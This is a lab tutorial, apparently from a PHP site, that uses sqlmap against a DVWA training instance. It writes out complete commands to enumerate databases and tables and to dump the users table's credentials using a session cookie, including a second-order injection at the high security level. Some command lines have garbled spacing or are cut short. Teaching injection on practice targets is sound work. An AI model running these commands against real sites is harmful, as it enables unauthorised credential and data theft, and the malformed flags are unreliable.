Sample analysis of Sqlmap automated injection

Use sqlmap to automate injection of dvwa
Set the dvwa level to low

1. Open the SQL Injection of dvwa (SQL Injection (Blind) ), open browser debugging, enter user id and submit to view the intercepted requests.
   

2. You can see that it is a GET request, the url "http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
   

3. Let’s put it directly into salmap to test, use the -u command -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit# "
   

4. You can see that you need to log in here, otherwise you will not be able to escape. So we need to add a cookie to maintain login
   

6. Use burp suite proxy to capture packets, obtain the login cookie, add --dbs burst data -u "http:// 192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" -- cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" --dbs

You can see that the database that exploded is mysql

7. We use -D xxx to specify the database to be viewed, and use --tables to view all tables in the database: -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit= Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa --tables

View the running results:

8. We use -D xxx -T ttt Specify the table to view, use --columns to view the columns of the table

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID =0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users --columns

9. We use -D xxx to view the database, -T xxx specifies the table to view, and -C xxx to view the columns of the table. -dump View column data

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users -C password,user --dump

• Adjust the dvwa security level to medium, save the captured data packets as a .txt file, and put In the sqlmap directory, directly -r file name --dbs (you can add subsequent parameters yourself)

• 
  

• Adjust the dvwa security level to high. Since the submission page this time is not the same page as the page that returns the results, the previous method cannot be used here. To use the second-level injection method
  

• The URL to submit data          
  

• Returned URL
  

Save the captured data packet as a .txt file and put it in the directory of sqlmap Next, explode the database, command: -r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" -- batch -- level 2 --dbs

         

                                                                                                                                                                                                                                                           

-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" - -batch --level 2 -D dvwa --tables

     

                                                                                                              ‐                                        "http://192.168.1.222:8089/vulnerabilities/sqli/"

-- batch --level 2 -D dvwa -T user --columns

Explode field data

-r 1.txt --second-url " http://192.168.1.222:8089/vulnerabilities/sqli/" -- batch --level 2 -D dvwa -T users -C user,password --dump

Some conceptual issues:

##Second-order injection: Second-order

• sql injection--second-order Sometimes when the data input at the injection point is returned, it is not the current page, but another page. At this time, you need to specify which page to get the response to determine whether it is true or false. –second-url followed by the URL address of the returned page

  
  

--batch: automatic default configuration, no need to manually press yes or no

• level:Sqlmap has a total of 5 detection levels, the default is 1. The higher the level, the more payloads are used during detection. Among them, level 5 has the most payloads and will automatically crack and inject headers such as cookies and XFF. Of course, the higher the level, the slower the detection time. This parameter will affect the injection point of the test. GET and POST data will be tested. HTTP cookie will be tested when level is 2. HTTP User-Agent/Referer header will be tested when level is 3. When you are not sure which parameter is the injection point, in order to ensure accuracy, it is recommended to set level to 5 (the speed will also become slower)
  

The above is the detailed content of Sample analysis of Sqlmap automated injection. For more information, please follow other related articles on the PHP Chinese website!